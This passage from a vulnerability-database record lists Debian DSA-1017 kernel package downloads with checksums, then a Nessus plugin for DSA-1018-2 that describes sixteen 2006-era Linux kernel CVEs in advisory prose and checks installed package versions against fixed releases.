http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-headers-2.6.8_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 5143830 3a6cd285eba77baae74a2a16f8029be2\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-headers-2.6.8-3_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 5145112 c45a74745d3359da81add15933eb847a\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-power3_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 13537930 b88fc7f255a362ff1af0f127c105fe21\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-power3-smp_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 13895234 1c6a336420e8af2d40962f6016104cab\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-power4_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 13526632 ad1bc642f915effd59fd6c2c646ed848\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-power4-smp_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 13883038 8afe1d42e0e03a81a55b108acd3a972d\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-powerpc_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 13558318 71034f429cb959413adcc9f7df642d30\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-powerpc-smp_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 13811714 79d63ee21fbcc4d343f73a391c2de350\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-power3_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 13494684 2ab633af498a4486190d3754c530e7f4\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-power3-smp_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 13855580 1245c9d474405a277864484b0237252f\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-power4_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 13486150 80b9f2ed16acb2c9fdb7c9cb133a4c03\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-power4-smp_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 13842602 e4013da64e44e6e0401aa87b1e68c1ce\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-powerpc_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 13514634 a3fbbf23d7b805431a5f9f28aadd25ab\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-powerpc-smp_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 13769858 20783767bb65e7ea6ca76662438bf7ca\n http://security.debian.org/pool/updates/main/m/mol-modules-2.6.8/mol-modules-2.6.8-3-powerpc_0.9.70+2.6.8+12sarge1_powerpc.deb\n Size/MD5 checksum: 38380 361eb34e717c3996b1b1118cac92da32\n http://security.debian.org/pool/updates/main/m/mol-modules-2.6.8/mol-modules-2.6.8-3-powerpc-smp_0.9.70+2.6.8+12sarge1_powerpc.deb\n Size/MD5 checksum: 39310 1c19f5fcbd866c83d6386ed643d08afa\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-headers-2.6.8-2_2.6.8-5sarge1_s390.deb\n Size/MD5 checksum: 5083010 42c4dd8c6c67ce7940f0d24bb745385c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-headers-2.6.8-3_2.6.8-5sarge2_s390.deb\n Size/MD5 checksum: 5084018 855029ce8570fc938826289ba375098b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-2-s390_2.6.8-5sarge1_s390.deb\n Size/MD5 checksum: 2973758 c8d12dd2fbddca3ab1b7bd905de4a90c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-2-s390-tape_2.6.8-5sarge1_s390.deb\n Size/MD5 checksum: 1140118 328edfc2944127e2f1d6dca1842ce51d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-2-s390x_2.6.8-5sarge1_s390.deb\n Size/MD5 checksum: 3179326 487c36323990a6ae1119f4c30f16cdd9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-3-s390_2.6.8-5sarge2_s390.deb\n Size/MD5 checksum: 2976012 d807ca6328f0f789b5f8dfff07d29db0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-3-s390-tape_2.6.8-5sarge2_s390.deb\n Size/MD5 checksum: 1140596 32f51209baa4d72d8ccf6d5ed57f4638\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-3-s390x_2.6.8-5sarge2_s390.deb\n Size/MD5 checksum: 3182684 fb892f14401c5cb0bc11a1f16a40a6fa\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-sparc/kernel-headers-2.6-sparc32_101sarge1_sparc.deb\n Size/MD5 checksum: 2094 ee7137ee7a7aaa37d5b0e34983d22ca5\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-sparc/kernel-headers-2.6-sparc64_101sarge1_sparc.deb\n Size/MD5 checksum: 2098 1f028cdda7b37f42a9c93712a2af9cac\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-sparc/kernel-headers-2.6-sparc64-smp_101sarge1_sparc.deb\n Size/MD5 checksum: 2106 c7539f2b30142c5e549e03e54a40ba35\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-sparc/kernel-image-2.6-sparc32_101sarge1_sparc.deb\n Size/MD5 checksum: 2070 3ea5f8502192782ebfba70500eeb7eab\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-sparc/kernel-image-2.6-sparc64_101sarge1_sparc.deb\n Size/MD5 checksum: 2072 d3966357806c24f79e9d4e858dedd635\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-sparc/kernel-image-2.6-sparc64-smp_101sarge1_sparc.deb\n Size/MD5 checksum: 2090 b2872959f522478d84039d84eebf4e4e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-build-2.6.8-2_2.6.8-15sarge1_sparc.deb\n Size/MD5 checksum: 3462 c68f0624f124db25f3a41f78432ca11c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-build-2.6.8-3_2.6.8-15sarge2_sparc.deb\n Size/MD5 checksum: 3516 e01d50a416f25627da8d7cf5282b0b4e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-2_2.6.8-15sarge1_sparc.deb\n Size/MD5 checksum: 2888690 29723527245a48a00e724c7366868ec9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-2-sparc32_2.6.8-15sarge1_sparc.deb\n Size/MD5 checksum: 107974 788d40ca3a1a3f53b8b2cf4c1fc4badc\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-2-sparc64_2.6.8-15sarge1_sparc.deb\n Size/MD5 checksum: 142726 8719b1bf0d3aff36f7711d8979f87a7d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-2-sparc64-smp_2.6.8-15sarge1_sparc.deb\n Size/MD5 checksum: 143332 87bc055c575e3ec3ea44136ed44dff6a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-3_2.6.8-15sarge2_sparc.deb\n Size/MD5 checksum: 2889160 058d5bbc4b91691fa87204302c7b1a8a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-3-sparc32_2.6.8-15sarge2_sparc.deb\n Size/MD5 checksum: 108198 d802239f368827f5cd139f3b8d5b9458\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-3-sparc64_2.6.8-15sarge2_sparc.deb\n Size/MD5 checksum: 142976 6e0c64f83cc5cb9342c0f65b61a62a30\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-3-sparc64-smp_2.6.8-15sarge2_sparc.deb\n Size/MD5 checksum: 143640 f6ba9cf8f830e9e9f2c6297d35a2bc57\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-2-sparc32_2.6.8-15sarge1_sparc.deb\n Size/MD5 checksum: 4545570 00d7c7e1caef41efcbc198a282f2b9f2\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-2-sparc64_2.6.8-15sarge1_sparc.deb\n Size/MD5 checksum: 7428184 1f146c58f98331bf5826520379bacd33\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-2-sparc64-smp_2.6.8-15sarge1_sparc.deb\n Size/MD5 checksum: 7622116 4de4c114879d82d79fc34cb93c070d43\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-3-sparc32_2.6.8-15sarge2_sparc.deb\n Size/MD5 checksum: 4547790 9cc8acb2d0a3e490dc3ae2ef8fc0f139\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-3-sparc64_2.6.8-15sarge2_sparc.deb\n Size/MD5 checksum: 7431432 af5c99841ee5dcaa8fed642a89653f52\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-3-sparc64-smp_2.6.8-15sarge2_sparc.deb\n Size/MD5 checksum: 7625246 2e40c6079591a28656a280f4e8d5f344\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-doc-2.6.8_2.6.8-16sarge2_all.deb\n Size/MD5 checksum: 6181586 52e464ad87d3d29f61211c3a20232459\n http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-patch-debian-2.6.8_2.6.8-16sarge2_all.deb\n Size/MD5 checksum: 1043588 4451df70d7b6df9b00ad788712959db3\n http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-16sarge2_all.deb\n Size/MD5 checksum: 34936164 826e6dc98eed9696f9070afd83a72559\n http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-tree-2.6.8_2.6.8-16sarge2_all.deb\n Size/MD5 checksum: 33842 28717b85541e3aa8aa872f61798d23fc\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-patch-2.6.8-s390_2.6.8-5sarge2_all.deb\n Size/MD5 checksum: 9244 3ba83cf4618348710094dbccbec1b0bb\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2006-03-23T00:00:00", "published": "2006-03-23T00:00:00", "id": "DEBIAN:DSA-1017-1:CD473", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00098.html", "title": "[SECURITY] [DSA 1017-1] New Linux kernel 2.6.8 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T09:44:31", "description": "The original update lacked recompiled ALSA modules against the new\n kernel ABI. Furthermore, kernel-latest-2.4-sparc now correctly\n depends on the updated packages. For completeness we're providing the\n original problem description :\n\n Several local and remote vulnerabilities have been discovered in the\n Linux kernel that may lead to a denial of service or the execution\n of arbitrary code. The Common Vulnerabilities and Exposures project\n identifies the following problems :\n\n - CVE-2004-0887\n Martin Schwidefsky discovered that the privileged\n instruction SACF (Set Address Space Control Fast) on\n the S/390 platform is not handled properly, allowing\n for a local user to gain root privileges.\n\n - CVE-2004-1058\n A race condition allows for a local user to read the\n environment variables of another process that is still\n spawning through /proc/.../cmdline.\n\n - CVE-2004-2607\n A numeric casting discrepancy in sdla_xfer allows\n local users to read portions of kernel memory via a\n large len argument which is received as an int but\n cast to a short, preventing read loop from filling a\n buffer.\n\n - CVE-2005-0449\n An error in the skb_checksum_help() function from the\n netfilter framework has been discovered that allows\n the bypass of packet filter rules or a denial of\n service attack.\n\n - CVE-2005-1761\n A vulnerability in the ptrace subsystem of the IA-64\n architecture can allow local attackers to overwrite\n kernel memory and crash the kernel.\n\n - CVE-2005-2457\n Tim Yamin discovered that insufficient input\n validation in the compressed ISO file system (zisofs)\n allows a denial of service attack through maliciously\n crafted ISO images.\n\n - CVE-2005-2555\n Herbert Xu discovered that the setsockopt() function\n was not restricted to users/processes with the\n CAP_NET_ADMIN capability. This allows attackers to\n manipulate IPSEC policies or initiate a denial of\n service attack.\n\n - CVE-2005-2709\n Al Viro discovered a race condition in the /proc\n handling of network devices. A (local) attacker could\n exploit the stale reference after interface shutdown\n to cause a denial of service or possibly execute code\n in kernel mode.\n\n - CVE-2005-2973\n Tetsuo Handa discovered that the udp_v6_get_port()\n function from the IPv6 code can be forced into an\n endless loop, which allows a denial of service attack.\n\n - CVE-2005-3257\n Rudolf Polzer discovered that the kernel improperly\n restricts access to the KDSKBSENT ioctl, which can\n possibly lead to privilege escalation.\n\n - CVE-2005-3783\n The ptrace code using CLONE_THREAD didn't use the\n thread group ID to determine whether the caller is\n attaching to itself, which allows a denial of service\n attack.\n\n - CVE-2005-3806\n Yen Zheng discovered that the IPv6 flow label code\n modified an incorrect variable, which could lead to\n memory corruption and denial of service.\n\n - CVE-2005-3848\n Ollie Wild discovered a memory leak in the\n icmp_push_reply() function, which allows denial of\n service through memory consumption.\n\n - CVE-2005-3857\n Chris Wright discovered that excessive allocation of\n broken file lock leases in the VFS layer can exhaust\n memory and fill up the system logging, which allows\n denial of service.\n\n - CVE-2005-3858\n Patrick McHardy discovered a memory leak in the\n ip6_input_finish() function from the IPv6 code, which\n allows denial of service.\n\n - CVE-2005-4618\n Yi Ying discovered that sysctl does not properly\n enforce the size of a buffer, which allows a denial of\n service attack.", "edition": 26, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1018-2 : kernel-source-2.4.27 - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1058", "CVE-2005-3783", "CVE-2005-2457", "CVE-2005-3858", "CVE-2004-0887", "CVE-2005-4618", "CVE-2005-3806", "CVE-2005-3257", "CVE-2005-3848", "CVE-2005-1761", "CVE-2005-2709", "CVE-2005-2973", "CVE-2004-2607", "CVE-2005-0449", "CVE-2005-3857", "CVE-2005-2555"], "modified": "2006-10-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kernel-source-2.4.27", "cpe:/o:debian:debian_linux:3.1"], "id": "DEBIAN_DSA-1018.NASL", "href": "https://www.tenable.com/plugins/nessus/22560", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1018. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22560);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0887\", \"CVE-2004-1058\", \"CVE-2004-2607\", \"CVE-2005-0449\", \"CVE-2005-1761\", \"CVE-2005-2457\", \"CVE-2005-2555\", \"CVE-2005-2709\", \"CVE-2005-2973\", \"CVE-2005-3257\", \"CVE-2005-3783\", \"CVE-2005-3806\", \"CVE-2005-3848\", \"CVE-2005-3857\", \"CVE-2005-3858\", \"CVE-2005-4618\");\n script_xref(name:\"DSA\", value:\"1018\");\n\n script_name(english:\"Debian DSA-1018-2 : kernel-source-2.4.27 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The original update lacked recompiled ALSA modules against the new\n kernel ABI. Furthermore, kernel-latest-2.4-sparc now correctly\n depends on the updated packages. For completeness we're providing the\n original problem description :\n\n Several local and remote vulnerabilities have been discovered in the\n Linux kernel that may lead to a denial of service or the execution\n of arbitrary code. The Common Vulnerabilities and Exposures project\n identifies the following problems :\n\n - CVE-2004-0887\n Martin Schwidefsky discovered that the privileged\n instruction SACF (Set Address Space Control Fast) on\n the S/390 platform is not handled properly, allowing\n for a local user to gain root privileges.\n\n - CVE-2004-1058\n A race condition allows for a local user to read the\n environment variables of another process that is still\n spawning through /proc/.../cmdline.\n\n - CVE-2004-2607\n A numeric casting discrepancy in sdla_xfer allows\n local users to read portions of kernel memory via a\n large len argument which is received as an int but\n cast to a short, preventing read loop from filling a\n buffer.\n\n - CVE-2005-0449\n An error in the skb_checksum_help() function from the\n netfilter framework has been discovered that allows\n the bypass of packet filter rules or a denial of\n service attack.\n\n - CVE-2005-1761\n A vulnerability in the ptrace subsystem of the IA-64\n architecture can allow local attackers to overwrite\n kernel memory and crash the kernel.\n\n - CVE-2005-2457\n Tim Yamin discovered that insufficient input\n validation in the compressed ISO file system (zisofs)\n allows a denial of service attack through maliciously\n crafted ISO images.\n\n - CVE-2005-2555\n Herbert Xu discovered that the setsockopt() function\n was not restricted to users/processes with the\n CAP_NET_ADMIN capability. This allows attackers to\n manipulate IPSEC policies or initiate a denial of\n service attack.\n\n - CVE-2005-2709\n Al Viro discovered a race condition in the /proc\n handling of network devices. A (local) attacker could\n exploit the stale reference after interface shutdown\n to cause a denial of service or possibly execute code\n in kernel mode.\n\n - CVE-2005-2973\n Tetsuo Handa discovered that the udp_v6_get_port()\n function from the IPv6 code can be forced into an\n endless loop, which allows a denial of service attack.\n\n - CVE-2005-3257\n Rudolf Polzer discovered that the kernel improperly\n restricts access to the KDSKBSENT ioctl, which can\n possibly lead to privilege escalation.\n\n - CVE-2005-3783\n The ptrace code using CLONE_THREAD didn't use the\n thread group ID to determine whether the caller is\n attaching to itself, which allows a denial of service\n attack.\n\n - CVE-2005-3806\n Yen Zheng discovered that the IPv6 flow label code\n modified an incorrect variable, which could lead to\n memory corruption and denial of service.\n\n - CVE-2005-3848\n Ollie Wild discovered a memory leak in the\n icmp_push_reply() function, which allows denial of\n service through memory consumption.\n\n - CVE-2005-3857\n Chris Wright discovered that excessive allocation of\n broken file lock leases in the VFS layer can exhaust\n memory and fill up the system logging, which allows\n denial of service.\n\n - CVE-2005-3858\n Patrick McHardy discovered a memory leak in the\n ip6_input_finish() function from the IPv6 code, which\n allows denial of service.\n\n - CVE-2005-4618\n Yi Ying discovered that sysctl does not properly\n enforce the size of a buffer, which allows a denial of\n service attack.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2004-0887\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2004-1058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2004-2607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-0449\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-1761\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-2457\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-2555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-2709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-2973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3783\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3848\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3857\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3858\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-4618\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1018\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the kernel package immediately and reboot the machine. If you\nhave built a custom kernel from the kernel source package, you will\nneed to rebuild to take advantage of these fixes.\n\nThe following matrix explains which kernel version for which\narchitecture fix the problems mentioned above :\n\n Debian 3.1 (sarge) \n Source 2.4.27-10sarge2 \n Alpha architecture 2.4.27-10sarge2 \n ARM architecture 2.4.27-2sarge2 \n Intel IA-32 architecture 2.4.27-10sarge2 \n Intel IA-64 architecture 2.4.27-10sarge2 \n Motorola 680x0 architecture 2.4.27-3sarge2 \n Big endian MIPS architecture 2.4.27-10.sarge1.040815-2 \n Little endian MIPS architecture 2.4.27-10.sarge1.040815-2 \n PowerPC architecture 2.4.27-10sarge2 \n IBM S/390 architecture 2.4.27-2sarge2 \n Sun Sparc architecture 2.4.27-9sarge2 \nThe following matrix lists additional packages that were rebuilt for\ncompatibility with or to take advantage of this update :\n\n Debian 3.1 (sarge) \n kernel-latest-2.4-alpha 101sarge1 \n kernel-latest-2.4-i386 101sarge1 \n kernel-latest-2.4-s390 2.4.27-1sarge1 \n kernel-latest-2.4-sparc 42sarge1 \n kernel-latest-powerpc 102sarge1 \n fai-kernels 1.9.1sarge1 \n i2c 1:2.9.1-1sarge1 \n kernel-image-speakup-i386 2.4.27-1.1sasrge1 \n lm-sensors 1:2.9.1-1sarge3 \n mindi-kernel 2.4.27-2sarge1 \n pcmcia-modules-2.4.27-i386 3.2.5+2sarge1 \n systemimager 3.2.3-6sarge1 \nThis update introduces a change in the kernel's binary interface, the\naffected kernel packages inside Debian have been rebuilt, if you're\nrunning local addons you'll need to rebuild these as well.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.4.27\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"i2c-2.4.27-3-386\", reference:\"2.9.1-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"i2c-2.4.27-3-586tsc\", reference:\"2.9.1-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"i2c-2.4.27-3-686\", reference:\"2.9.1-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"i2c-2.4.27-3-686-smp\", reference:\"2.9.1-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"i2c-2.4.27-3-k6\", reference:\"2.9.1-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"i2c-2.4.27-3-k7\", reference:\"2.9.1-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"i2c-2.4.27-3-k7-smp\", reference:\"2.9.1-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"i2c-source\", reference:\"2.9.1-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.4.27\", reference:\"2.4.27-2sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.4.27-3\", reference:\"2.4.27-9sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.4.27-apus\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.4.27-nubus\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.4.27-powerpc\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.4.27-powerpc-small\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-build-2.4.27-powerpc-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-doc-2.4.27\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-doc-2.4.27-speakup\", reference:\"2.4.27-1.1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-386\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-586tsc\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-686\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-686-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-generic\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-k6\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-k7\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-k7-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-s390\", reference:\"2.4.27-1sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-smp\", reference:\"101sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-sparc32\", reference:\"42sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-sparc32-smp\", reference:\"42sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-sparc64\", reference:\"42sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4-sparc64-smp\", reference:\"42sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27\", reference:\"2.4.27-10.sarge2.040815-1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3\", reference:\"2.4.27-9sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-386\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-586tsc\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-686\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-686-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-generic\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-itanium\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-itanium-smp\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"kernel-headers-2.4.27-3-k6\", reference:\"2.4.27-10sarge2\")) flag++;\nif (deb_check(release:\"3.1\", 